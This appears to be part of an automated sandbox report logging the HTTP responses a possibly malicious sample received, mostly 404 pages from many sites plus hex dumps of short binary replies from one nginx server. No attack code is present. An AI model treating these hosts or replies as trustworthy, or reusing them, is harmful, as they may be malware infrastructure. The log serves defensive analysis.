                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 05 Feb 2024 11:16:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedContent-Security-Policy: require-trusted-types-for 'script';report-uri /cspreportContent-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreportReport-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"X-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockServer: GSEAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
https://aws.api.snapchat.com/snapchat.ab.exposure_service.ExposureService/BatchUpdateAbExposure https://chat-gold.sc-corp.net; img-src 'self' data: https://ssl.gstatic.com https://www.snapchat.com https://sc-oauth2-client-icons-dev.storage.googleapis.com https://sc-oauth2-client-icons.storage.googleapis.com https://storage.googleapis.com https://www.google-analytics.com https://images.ctfassets.net https://sdk.bitmoji.com; media-src 'self' https://storage.googleapis.com; form-action 'self' https://*.snap.com https://*.snapchat.com https://*.snap-dev.net https://*.sc-corp.net https://localhost:3000; frame-ancestors https://iframe.arkoselabs.com https://profile.softserve-local-prod.snap-dev.net https://preproduction-dot-snap-profile-manager.snapchat.com https://hotfix-dot-snap-profile-manager.snapchat.com https://snap-profile-manager.snapchat.com https://profile-preprod.snapchat.com https://business-preprod.snapchat.com https://profile.snapchat.com https://business.snapchat.com https://enterprise.snap.com;x-content-security-policy: default-src 'self'; script-
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Mon, 05 Feb 2024 11:16:12 GMTx-content-type-options: nosniffx-xss-protection: 1;mode=blockcache-control: no-cache, privatetransfer-encoding: chunkedcontent-type: text/html; charset=UTF-8x-frame-options: SAMEORIGINconnection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 05 Feb 2024 11:16:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedContent-Security-Policy: require-trusted-types-for 'script';report-uri /cspreportContent-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreportReport-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"X-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockServer: GSEAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 05 Feb 2024 11:16:13 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachewww-authenticate: Basic realm="EnterPassword"x-frame-options: SAMEORIGINx-turbo-charged-by: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=oX1Wysvm258tZWuiG2lXX4QoiNwYfmvfoY7RCwZAntGRcVj9pC8Ct4G4qdMZ3u3doyd%2FxcZocj5xmiuEZ%2B5%2FKSvK%2FzPJZ2A%2BPSr1aUesYdB0KTGjBjPWOjjF15f4XdE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 850abd710da9b0ee-ATLalt-svc: h3=":443"; ma=86400
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:16:13 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 05 Feb 2024 11:16:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedContent-Security-Policy: require-trusted-types-for 'script';report-uri /cspreportContent-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreportReport-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"X-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockServer: GSEAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:16:13 GMTContent-Type: text/htmlContent-Length: 7358Connection: closeServer: nginx/1.12.2Vary: Accept-EncodingETag: "5df8f9a3-1cbe"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Type: text/htmlNgrok-Error-Code: ERR_NGROK_3200Ngrok-Trace-Id: 6f775cd5dd0c092eb62fa3f5c7333771Referrer-Policy: no-referrerDate: Mon, 05 Feb 2024 11:16:13 GMTTransfer-Encoding: chunked
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/8.1.26expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://mobilsam.com/wp-json/>; rel="https://api.w.org/"x-litespeed-cache-control: public,max-age=3600x-litespeed-tag: 106_HTTP.404,106_404,106_URL.0045a36e9aa35622a617ea518918c32d,106_x-litespeed-cache: misstransfer-encoding: chunkeddate: Mon, 05 Feb 2024 11:16:13 GMTserver: LiteSpeedplatform: hostingercontent-security-policy: upgrade-insecure-requestsalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETStrict-Transport-Security: max-age=31536000; includeSubDomainsDate: Mon, 05 Feb 2024 11:16:12 GMTConnection: closeContent-Length: 1245X-CDN: ImpervaX-Iinfo: 3-31484936-31484965 NNNY CT(118 135 0) RT(1707131773054 398) q(0 0 0 -1) r(0 1) U24
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:16:13 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OnqRHQ2azDFaFwyxwOdel74%2FugULTjZXjHMOtC6jKS2%2BLBjoQfNIPvC98bn6Zr30Scemkg%2BAzM0oyGl%2BSFz8eF%2FiDrt3kQdUaif93N5IUhKGFzrPF1wDylRfKBqS5pCrY3ENYAYciMHUtXE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 850abd6fccbdb121-ATL
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeserver: envoydate: Mon, 05 Feb 2024 11:16:13 GMTcontent-security-policy: frame-ancestors https://*.booking.com 'self'; report-uri https://nellie.booking.com/csp-report-uri?type=block&tag=212&pid=3c384f3e96cf001b&e=UmFuZG9tSVYkc2RlIyh9YSWKtKO5TxgOpTwVTPfHZKNW3Hcrm1RLgTofTsWVfilM28zDN-eA-X1rEpLDxs1ICqaeiDPezNiIcontent-security-policy-report-only: base-uri 'none'; connect-src saa.booking.com secure.booking.com reports.booking.com privacyportal-eu.onetrust.com geolocation.onetrust.com cdn.cookielaw.org www.google-analytics.com *.perimeterx.net *.pxchk.net *.px-cdn.net *.px-client.net *.px-cloud.net 'self' 'report-sample'; default-src *.bstatic.com bstatic.com 'self'; frame-src https://www.youtube.com/embed/Vv4w5SmRkss *.bstatic.com https://www.google.com bstatic.com www.booking.com secure.booking.com paymentcomponent.booking.com 'self'; img-src 'self' data: www.booking.com graph.facebook.com cdn.cookielaw.org account.booking.com *.bstatic.com bstatic.com *.static.booking.cn www.google-analytics.com www.google.com stats.g.doubleclick.net *.px-cloud.net *.perimeterx.net www.gstatic.com; object-src 'none'; report-uri https://nellie.booking.com/csp-report-uri?type=report&tag=213&pid=3c384f3e96cf001b&e=UmFuZG9tSVYkc2RlIyh9YSWKtKO5TxgOpTwVTPfHZKNW3Hcrm1RLgTofTsWVfilM28zDN-eA-X1rEpLDxs1ICqaeiDPezNiI; script-src saa.booking.com *.bstatic.com bstatic.com *.static.booking.cn www.google.com www.google-analytics.com cdn.cookielaw.org geolocation.onetrust.com 'self' 'nonce-8CkX0tTN0wISZS0' 'report-sample'; style-src *.bstatic.com bstatic.com *.static.booking.cn 'self' 'unsafe-inline'x-xss-protection: 1; mode=blockstrict-transport-security: max-age=86400; includeSubDomainsX-Cache: Error from cloudfrontVia: 1.1 7e1e27db89c10c5d284149b3df2ae272.cloudfront.net (CloudFront)X-Amz-Cf-Pop: ATL59-P5X-Amz-Cf-Id: 
WaBxQvY1IzXgA6EPIUuZY34uXiY6D_8EhwMer05u_ZrTDrz8AQf6bQ==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:16:13 GMTContent-Type: text/html;charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingSet-Cookie: PHPSESSID=h22ommkr94dg2i4eebha6sl5bj; path=/Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cache
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:16:14 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BjkoOWZ0aBem6AH8WAvzXc0h0iQESsyVcAZb4EUccLIMLZ8JpcnIj3yJnBkU5bOcsc9jo0diWOiBMvwxCWdyez%2FiJ2zMW17Bx7JXW24%2BS130hrnklGaCarHdJbE1S%2B927QigFvX1iYI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 850abd71ead2678b-ATLalt-svc: h3=":443"; ma=86400
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:16:13 GMTContent-Length: 0Connection: closeVary: Accept-Encoding
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeserver: envoydate: Mon, 05 Feb 2024 11:16:13 GMTcontent-security-policy: frame-ancestors https://*.booking.com 'self'; report-uri https://nellie.booking.com/csp-report-uri?type=block&tag=212&pid=7ca24f3e5c1e003d&e=UmFuZG9tSVYkc2RlIyh9YSWKtKO5TxgOpTwVTPfHZKNW3Hcrm1RLgfwAYFouQ6BkipNeG7KLRLX-Kzp6iEpSvg81iKjTx_Jvcontent-security-policy-report-only: base-uri 'none'; connect-src saa.booking.com secure.booking.com reports.booking.com privacyportal-eu.onetrust.com geolocation.onetrust.com cdn.cookielaw.org www.google-analytics.com *.perimeterx.net *.pxchk.net *.px-cdn.net *.px-client.net *.px-cloud.net 'self' 'report-sample'; default-src *.bstatic.com bstatic.com 'self'; frame-src https://www.youtube.com/embed/Vv4w5SmRkss *.bstatic.com https://www.google.com bstatic.com www.booking.com secure.booking.com paymentcomponent.booking.com 'self'; img-src 'self' data: www.booking.com graph.facebook.com cdn.cookielaw.org account.booking.com *.bstatic.com bstatic.com *.static.booking.cn www.google-analytics.com www.google.com stats.g.doubleclick.net *.px-cloud.net *.perimeterx.net www.gstatic.com; object-src 'none'; report-uri https://nellie.booking.com/csp-report-uri?type=report&tag=213&pid=7ca24f3e5c1e003d&e=UmFuZG9tSVYkc2RlIyh9YSWKtKO5TxgOpTwVTPfHZKNW3Hcrm1RLgfwAYFouQ6BkipNeG7KLRLX-Kzp6iEpSvg81iKjTx_Jv; script-src saa.booking.com *.bstatic.com bstatic.com *.static.booking.cn www.google.com www.google-analytics.com cdn.cookielaw.org geolocation.onetrust.com 'self' 'nonce-vONTvDDlfmHoPD9' 'report-sample'; style-src *.bstatic.com bstatic.com *.static.booking.cn 'self' 'unsafe-inline'x-xss-protection: 1; mode=blockstrict-transport-security: max-age=86400; includeSubDomainsX-Cache: Error from cloudfrontVia: 1.1 57674a900f587a3a1f1571205e001c6c.cloudfront.net (CloudFront)X-Amz-Cf-Pop: ATL59-P5X-Amz-Cf-Id: 
vwkqfs6A3ra1GuWD7jumUwQvjZKkyh_pHCMBRKhB-rAiIRhUbZ_2wQ==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:16:14 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-powered-by: PHP/7.0.33-6+ubuntu14.04.1+deb.sury.org+3expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatepragma: no-cacheset-cookie: warriorplus=giequ27s2rlgl173cf4omrgtg5; expires=Wed, 06-Mar-2024 11:16:13 GMT; Max-Age=2592000; path=/set-cookie: rqtok=cc06cf2a2b3b701ce398; expires=Tue, 06-Feb-2024 11:16:13 GMT; Max-Age=86400; path=/set-cookie: TOKEN=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/set-cookie: TOKEN=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/set-cookie: PASSWORD=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/set-cookie: PASSWORD=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/set-cookie: notifications=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/set-cookie: notifications_aff=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/set-cookie: notifications_sales=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/set-cookie: wpg=gw1s33s7p59ds9s2; expires=Tue, 04-Feb-2025 11:16:13 GMT; Max-Age=31536000; path=/set-cookie: wpg=gw1s33s7p59ds9s2; expires=Tue, 04-Feb-2025 11:16:13 GMT; Max-Age=31536000; path=/
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 05 Feb 2024 11:12:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 53 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=S0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 05 Feb 2024 11:12:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 05 Feb 2024 11:12:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-alive
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 05 Feb 2024 11:12:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 05 Feb 2024 11:12:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-alive
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 05 Feb 2024 11:12:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 05 Feb 2024 11:12:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-alive
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 05 Feb 2024 11:12:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 65 6c 65 62 72 61 74 69 6f 6e 31 37 69 6f 2e 69 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 05 Feb 2024 11:12:25 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-alive
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 05 Feb 2024 11:12:26 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 05 Feb 2024 11:12:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 33 34 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 0f 90 10 dd 1a d3 e0 01 af 24 f0 2d 0b 5a 38 fd 29 00 65 98 59 66 1b 7d d7 e2 89 bd cc 6a c1 7e 2f 0d 0a 30 0d 0a 0d 0a Data Ascii: 34Uys/~(`:$-Z8)eYf}j~/0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 05 Feb 2024 11:12:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 05 Feb 2024 11:12:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 34 37 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 4c cd 44 9f 05 85 a4 4e f2 7b a9 64 14 00 78 a2 3e 5c 67 d8 0f 2b 09 7a 80 f5 d3 ed d7 70 97 3f 2e 5e 61 be b4 bf f7 5a 6e 94 2b 7b be d5 d4 3f a6 55 70 fb 0d 0a 30 0d 0a 0d 0a Data Ascii: 47Uys/~(`:LDN{dx>\g+zp?.^aZn+{?Up0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 05 Feb 2024 11:12:36 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 05 Feb 2024 11:12:36 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 63 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 09 87 1c c1 57 9c f5 0f ae 66 f2 22 40 5a 3c bf 6f 0a 60 89 40 67 1b 71 c1 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cUys/~(`:Wf"@Z<o`@gq0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 05 Feb 2024 11:12:47 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-Powered-By: ExpressContent-Security-Policy: default-src 'none'X-Content-Type-Options: nosniffContent-Type: text/html; charset=utf-8Content-Length: 147Date: Mon, 05 Feb 2024 11:13:27 GMTConnection: keep-aliveKeep-Alive: timeout=5Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot GET /ping.php</pre></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 05 Feb 2024 11:13:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 05 Feb 2024 11:13:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 05 Feb 2024 11:13:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 05 Feb 2024 11:14:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 05 Feb 2024 11:14:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 05 Feb 2024 11:14:03 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 05 Feb 2024 11:14:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 05 Feb 2024 11:14:09 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 05 Feb 2024 11:14:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 05 Feb 2024 11:14:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 05 Feb 2024 11:14:21 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 05 Feb 2024 11:14:25 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
